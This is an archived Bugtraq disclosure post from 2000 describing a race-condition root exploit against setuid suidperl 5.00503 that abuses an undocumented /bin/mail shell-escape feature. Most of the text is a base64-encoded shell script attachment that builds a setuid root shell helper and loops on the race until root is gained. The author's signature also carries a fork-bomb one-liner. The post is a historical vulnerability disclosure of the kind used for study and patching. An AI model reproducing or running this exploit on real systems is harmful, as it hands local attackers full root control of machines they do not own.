[LWN Logo]
[Timeline]
Date:         Sat, 5 Aug 2000 18:39:22 +0200
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
Subject:      sperl 5.00503 (and newer ;) exploit
To: BUGTRAQ@SECURITYFOCUS.COM

  This message is in MIME format.  The first part should be readable text,
  while the remaining parts are likely unreadable without MIME-aware tools.
  Send mail to mime@docserver.cac.washington.edu for more info.

--1975728899-1030147653-965493562=:26685
Content-Type: TEXT/PLAIN; charset=US-ASCII


Not much to say (except I feel little bit stupid posting it) ... This
exploit gives instant root, at least on RedHat 6.x/7.0 Linux boxes I have
available for tests... And for sure, all other systems are vulnerable as
well - it's just maybe this code will need some refining / tuning /
minor changes...

Below you'll find brief description of vulnerability and exploit itself,
written by me. Please note - I didn't developed everything by myself, I
get great support from Sebastian Krahmer - see development history. I
still pray he won't get angry on me (probably he will) - but he should be
listed at first any time you're talking about this vulnerablity (he made
me think with his findings :P).

I don't know who should be blamed - perl vendors? /bin/mail vendors for
putting undocumented (at least on manpage) features? Hmm... I guess it's
nobody's fault ;)

Requires: +s perl; bash, gcc, make, usleep (yup, usleep; it's not
available on every system, but I have no time to rewrite everything in C;
you can grab this code from RedHat distro or so) will be good... Don't
mail me if you can't use it - it works.

And now, some reading.

#
#    -- PLEASE READ THESE COMMENTS CAREFULLY BEFORE TRYING ANYTHING --
#
# Wonderful, lovely, world-smashing, exciting perl exploit. It works against
# +s suidperl, exploiting undocumented /bin/mail feature when perl wants to
# notify root on inode race conditions. Currently, tested under RH Linux.
#
# What's probably most shocking, buggy code has following comment inside:
# /* heh, heh */. I guess author wasn't laughning last.
#
# Development history of this exploit is really funny. I found this condition
# about 4 months ago, but thought it's useless (who wants to notify root?).
# I deleted my test code and didn't left any notes on it. Then, month after
# this discovery, Sebastian contacted me. He was working on perl exploit.
# He told me he don't know how to cause this condition to happen, but if only
# he realise how it can be done, he'll be able to use undocumented /bin/mail
# feature - environmental variable 'interactive', which, if set, causes
# /bin/mail to interpret ~! commands (subshell requests) even if stdin is not
# on terminal. And then I understood what I've done. I spent next month
# (yes! no kidding!) trying to recall WHAT THE FSCK was the condition. I
# remembered it was trivial, even annoying... And finally, now I'm able to
# reconstruct it.
#
# This exploit tries to fit in rather short, but reasonable time window in
# order to exploit bug. I tested it on fast, not overloaded Linux box, and
# I guess on slow machines it needs tunning. It needs anything setuid
# (/usr/bin/passwd is just fine), writable working directory and something
# around 4 minutes. Working directory should be mounted without noexec or
# nosuid options (if so, find something like /var/lib/svgalib etc).
#
# WARNING: On slow machines, it's quite possible this exploit will cause
# heavy load. Please test it when system is not overloaded and not used
# (eg. at night).
#
# I'd like to thank Sebastian Krahmer for his help (in fact, HE discovered it
# - I think I can say it without shame), and especially thank to several of
# my braincells that survived monitor radiation and made me recall this
# race condition.
#
# Send comments, ideas and flames to <lcamtuf@ids.pl>
# Tested with sperl 5.00503, but should work with any other as well.
#
# Good luck and don't abuse it.
#

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=

--1975728899-1030147653-965493562=:26685
Content-Type: APPLICATION/x-sh; name="xperl.sh"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0008051839220.26685@dione.ids.pl>
Content-Description:
Content-Disposition: attachment; filename="xperl.sh"

IyEvYmluL3NoCgojCiMgICAgLS0gUExFQVNFIFJFQUQgVEhFU0UgQ09NTUVO
VFMgQ0FSRUZVTExZIEJFRk9SRSBUUllJTkcgQU5ZVEhJTkcgLS0KIwojIFdv
bmRlcmZ1bCwgbG92ZWx5LCB3b3JsZC1zbWFzaGluZywgZXhjaXRpbmcgcGVy
bCBleHBsb2l0LiBJdCB3b3JrcyBhZ2FpbnN0CiMgK3Mgc3VpZHBlcmwsIGV4
cGxvaXRpbmcgdW5kb2N1bWVudGVkIC9iaW4vbWFpbCBmZWF0dXJlIHdoZW4g
cGVybCB3YW50cyB0bwojIG5vdGlmeSByb290IG9uIGlub2RlIHJhY2UgY29u
ZGl0aW9ucy4gQ3VycmVudGx5LCB0ZXN0ZWQgdW5kZXIgUkggTGludXguCiMK
IyBXaGF0J3MgcHJvYmFibHkgbW9zdCBzaG9ja2luZywgYnVnZ3kgY29kZSBo
YXMgZm9sbG93aW5nIGNvbW1lbnQgaW5zaWRlOgojIC8qIGhlaCwgaGVoICov
LiBJIGd1ZXNzIGF1dGhvciB3YXNuJ3QgbGF1Z2huaW5nIGxhc3QuCiMKIyBE
ZXZlbG9wbWVudCBoaXN0b3J5IG9mIHRoaXMgZXhwbG9pdCBpcyByZWFsbHkg
ZnVubnkuIEkgZm91bmQgdGhpcyBjb25kaXRpb24KIyBhYm91dCA0IG1vbnRo
cyBhZ28sIGJ1dCB0aG91Z2h0IGl0J3MgdXNlbGVzcyAod2hvIHdhbnRzIHRv
IG5vdGlmeSByb290PykuCiMgSSBkZWxldGVkIG15IHRlc3QgY29kZSBhbmQg
ZGlkbid0IGxlZnQgYW55IG5vdGVzIG9uIGl0LiBUaGVuLCBtb250aCBhZnRl
cgojIHRoaXMgZGlzY292ZXJ5LCBTZWJhc3RpYW4gY29udGFjdGVkIG1lLiBI
ZSB3YXMgd29ya2luZyBvbiBwZXJsIGV4cGxvaXQuCiMgSGUgdG9sZCBtZSBo
ZSBkb24ndCBrbm93IGhvdyB0byBjYXVzZSB0aGlzIGNvbmRpdGlvbiB0byBo
YXBwZW4sIGJ1dAojIGlmIGhlIHJlYWxpc2UgaG93IGhlIGNhbiBkbyBpdCwg
aGUnbGwgYmUgYWJsZSB0byB1c2UgdW5kb2N1bWVudGVkIC9iaW4vbWFpbAoj
IGZlYXR1cmUgLSBlbnZpcm9ubWVudGFsIHZhcmlhYmxlICdpbnRlcmFjdGl2
ZScsIHdoaWNoLCBpZiBzZXQsIGNhdXNlcwojIC9iaW4vbWFpbCB0byBpbnRl
cnByZXQgfiEgY29tbWFuZHMgKHN1YnNoZWxsIHJlcXVlc3RzKSBldmVuIGlm
IHN0ZGluIGlzIG5vdAojIG9uIHRlcm1pbmFsLiBBbmQgdGhlbiBJIHVuZGVy
c3Rvb2Qgd2hhdCBJJ3ZlIGRvbmUuIEkgc3BlbnQgbmV4dCBtb250aAojICh5
ZXMhIG5vIGtpZGRpbmchKSB0cnlpbmcgdG8gcmVjYWxsIHdoYXQgdGhlIGZz
Y2sgd2FzIHRoZSBjb25kaXRpb24uIEkKIyByZW1lbWJlcmVkIGl0IHdhcyB0
cml2aWFsLCBldmVuIGFubm95aW5nLi4uIEFuZCBmaW5hbGx5LCBub3cgSSdt
IGFibGUgdG8KIyByZWNvbnN0cnVjdCBpdC4KIwojIFRoaXMgZXhwbG9pdCB0
cmllcyB0byBmaXQgaW4gcmF0aGVyIHNob3J0LCBidXQgcmVhc29uYWJsZSB0
aW1lIHdpbmRvdyBpbgojIG9yZGVyIHRvIGV4cGxvaXQgaXQuIEkgdGVzdGVk
IGl0IG9uIGZhc3QsIG5vdCBvdmVybG9hZGVkIExpbnV4IGJveCwgYW5kCiMg
SSBndWVzcyBvbiBzbG93IG1hY2hpbmVzIGl0IG5lZWRzIHR1bm5pbmcuIEl0
IG5lZWRzIGFueXRoaW5nIHNldHVpZAojICgvdXNyL2Jpbi9wYXNzd2QgaXMg
anVzdCBmaW5lKSwgd3JpdGFibGUgd29ya2luZyBkaXJlY3RvcnkgYW5kIHNv
bWV0aGluZwojIGFyb3VuZCA0IG1pbnV0ZXMuIFdvcmtpbmcgZGlyZWN0b3J5
IHNob3VsZCBiZSBtb3VudGVkIHdpdGhvdXQgbm9leGVjIG9yCiMgbm9zdWlk
IG9wdGlvbnMgKGlmIHNvLCBmaW5kIHNvbWV0aGluZyBsaWtlIC92YXIvbGli
L3N2Z2FsaWIgZXRjKS4KIwojIFdBUk5JTkc6IE9uIHNsb3cgbWFjaGluZXMs
IGl0J3MgcXVpdGUgcG9zc2libGUgdGhpcyBleHBsb2l0IHdpbGwgY2F1c2UK
IyBoZWF2eSBsb2FkLiBQbGVhc2UgdGVzdCBpdCB3aGVuIHN5c3RlbSBpcyBu
b3Qgb3ZlcmxvYWRlZCBhbmQgbm90IHVzZWQKIyAoZWcuIGF0IG5pZ2h0KS4K
IwojCiMgSSdkIGxpa2UgdG8gdGhhbmsgU2ViYXN0aWFuIEtyYWhtZXIgZm9y
IGhpcyBoZWxwIChpbiBmYWN0LCBIRSBkaXNjb3ZlcmVkIGl0CiMgLSBJIHRo
aW5rIEkgY2FuIHNheSBpdCB3aXRob3V0IHNoYW1lKSwgYW5kIGVzcGVjaWFs
bHkgdGhhbmsgdG8gc2V2ZXJhbCBvZgojIG15IGJyYWluY2VsbHMgdGhhdCBz
dXJ2aXZlZCBtb25pdG9yIHJhZGlhdGlvbiBhbmQgbWFkZSBtZSByZWNhbGwg
dGhpcwojIHJhY2UgY29uZGl0aW9uLgojCiMgU2VuZCBjb21tZW50cywgaWRl
YXMgYW5kIGZsYW1lcyB0byA8bGNhbXR1ZkBpZHMucGw+CiMgVGVzdGVkIHdp
dGggc3BlcmwgNS4wMDUwMywgYnV0IHNob3VsZCB3b3JrIHdpdGggYW55IG90
aGVyIGFzIHdlbGwuCiMKIyBHb29kIGx1Y2sgYW5kIGRvbid0IGFidXNlIGl0
LgojCgpjbGVhcgoKZWNobyAiU3VpZHBlcmwgNS4wMDUwMyAoYW5kIG5ld2Vy
KSByb290IGV4cGxvaXQiCmVjaG8gIi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tIgplY2hvICJXcml0dGVuIGJ5IE1pY2hhbCBa
YWxld3NraSA8bGNhbXR1ZkBkaW9uZS5pZHMucGw+IgplY2hvICJXaXRoIGdy
ZWF0IHJlc3BlY3QgdG8gU2ViYXN0aWFuIEtyYWhtZXIuLi4iCmVjaG8KClNV
SURQRVJMPS91c3IvYmluL3N1aWRwZXJsClNVSURCSU49L3Vzci9iaW4vcGFz
c3dkCgplY2hvICJbKl0gVXNpbmcgc3VpZHBlcmw9JFNVSURQRVJMLCBzdWlk
YmluPSRTVUlEQklOLi4uIgoKaWYgWyAhIC11ICRTVUlEUEVSTCBdOyB0aGVu
CiAgZWNobyAiWy1dIFNvcnJ5LCAkU1VJRFBFUkw0IGlzIE5PVCBzZXR1aWQg
b24gdGhpcyBzeXN0ZW0gb3IiCiAgZWNobyAiICAgIGRvZXMgbm90IGV4aXN0
IGF0IGFsbC4gSWYgdGhlcmUncyArcyBwZXJsIGJpbmFyeSBhdmFpbGFibGUs
IgogIGVjaG8gIiAgICBwbGVhc2UgY2hhbmdlIFNVSURQRVJMIHZhcmlhYmxl
IHdpdGhpbiBleHBsb2l0IGNvZGUuIgogIGVjaG8KICBleGl0IDAKZmkKCgpp
ZiBbICEgLXUgJFNVSURCSU4gXTsgdGhlbgogIGVjaG8gIlstXSBTb3JyeSwg
JFNVSURCSU4gaXMgTk9UIHNldHVpZCBvbiB0aGlzIHN5c3RlbSBvciBkb2Vz
IG5vdCBleGlzdCBhdCIKICBlY2hvICIgICAgYWxsLiBQbGVhc2UgcGljayBh
bnkgb3RoZXIgK3MgYmluYXJ5IGFuZCBjaGFuZ2UgU1VJREJJTiB2YXJpYWJs
ZSIKICBlY2hvICIgICAgd2l0aGluIGV4cGxvaXQgY29kZS4iCiAgZWNobwog
IGV4aXQgMApmaQoKZWNobyAiWytdIENoZWNrcyBwYXNzZWQsIGNvbXBpbGlu
ZyBmbGFyZXMgYW5kIGhlbHBlciBhcHBsaWNhdGlvbnMuLi4iCmVjaG8KCmNh
dCA+ZmxhcmUgPDxfX2VvZl9fCiMhL3Vzci9iaW4vc3VpZHBlcmwKCnByaW50
ICJOb3RoaW5nIGNhbiBzdG9wIG1lIG5vdy4uLlxuIjsKCl9fZW9mX18KCmNh
dCA+YmlnaG9sZS5jIDw8X19lb2ZfXwptYWluKCkgewogIHNldHVpZCgwKTsK
ICBzZXRnaWQoMCk7CiAgY2hvd24oInN1c2giLDAsMCk7CiAgY2htb2QoInN1
c2giLDA0NzU1KTsKfQpfX2VvZl9fCgpjYXQgPnN1c2guYyA8PF9fZW9mX18K
bWFpbigpIHsKICBzZXR1aWQoMCk7CiAgc2V0Z2lkKDApOwogIHN5c3RlbSgi
L2Jpbi9iYXNoIik7Cn0KX19lb2ZfXwoKbWFrZSBiaWdob2xlIHN1c2gKCmVj
aG8KCmlmIFsgISAteCAuL3N1c2ggXTsgdGhlbgogIGVjaG8gIlstXSBPb3Bz
LCBzZWVtcyB0byBtZSBJIGNhbm5vdCBjb21waWxlIGhlbHBlciBhcHBsaWNh
dGlvbnMuIEVpdGhlciIKICBlY2hvICIgICAgeW91IGRvbid0IGhhdmUgd29y
a2luZyAnbWFrZScgb3IgJ2djYycgdXRpbGl0eS4gSWYgcG9zc2libGUsIgog
IGVjaG8gIiAgICBwbGVhc2UgY29tcGlsZSBiaWdob2xlLmMgYW5kIHN1c2gu
YyBtYW51YWxseSAodG8gYmlnaG9sZSBhbmQgc3VzaCkuIgogIGVjaG8gCiAg
ZXhpdCAwCmZpCgplY2hvICJbK10gU2V0dGluZyB1cCBlbnZpcm9ubWVudC4u
LiIKCmNobW9kIDQ3NTUgLi9mbGFyZQoKRklMRU5BTUU9J25vbmUKCn4hYmln
aG9sZQoKJwpleHBvcnQgaW50ZXJhY3RpdmU9MQpQQVRIPS46JFBBVEgKCmVj
aG8gIlsrXSBTdGFydGluZyBleHBsb2l0LiBJdCBjb3VsZCB0YWtlIHVwIHRv
IDUgbWludXRlcyBpbiBvcmRlciB0byBnZXQiCmVjaG8gIlsrXSB3b3JraW5n
IHJvb3Qgc2hlbGwuIFdBUk5JTkcgLSBXQVJOSU5HIC0gV0FSTklORzogaXQg
Y291bGQgY2F1c2UiCmVjaG8gIlsrXSBoZWF2eSBzeXN0ZW0gbG9hZC4iCgp3
aGlsZSA6OyBkbwogICggbG4gLWYgLXMgJFNVSURCSU4gIiRGSUxFTkFNRSI7
dXNsZWVwICRSQU5ET007IG5pY2UgLW4gKzIwICRTVUlEUEVSTCAuLyIkRklM
RU5BTUUiIDwuL2ZsYXJlICYgKSAmPi9kZXYvbnVsbCAmCiAgKCB1c2xlZXAg
JFJBTkRPTSA7IGxuIC1mIC1zIC9kZXYvc3RkaW4gIiRGSUxFTkFNRSIgKSAm
Pi9kZXYvbnVsbCAmCiAgaWYgWyAtdSAuL3N1c2ggXTsgdGhlbgogICAgZWNo
bwogICAgZWNobyAiWytdIFZPSUxBLCBCQUJFIDotKSBFbnRlcmluZyByb290
c2hlbGwuLi4iCiAgICBlY2hvCiAgICBybSAtZiAiJEZJTEVOQU1FIiBzdXNo
LmMgYmlnaG9sZSBiaWdob2xlLmMgZmxhcmUKICAgIC4vc3VzaAogICAgZWNo
bwogICAgZWNobyAiWytdIFRoYW5rIHlvdSBmb3IgdXNpbmcgTWFyY2hldyBJ
bmR1c3RyaWVzIC8gZHVwYS5yeWJhIHByb2R1Y3RzLiIKICAgIGVjaG8KICAg
IHJtIC1mICIkRklMRU5BTUUiIHN1c2guYyBiaWdob2xlIGJpZ2hvbGUuYyBm
bGFyZSBzdXNoCiAgICBleGl0IDAKICBmaQpkb25lCgo=
--1975728899-1030147653-965493562=:26685--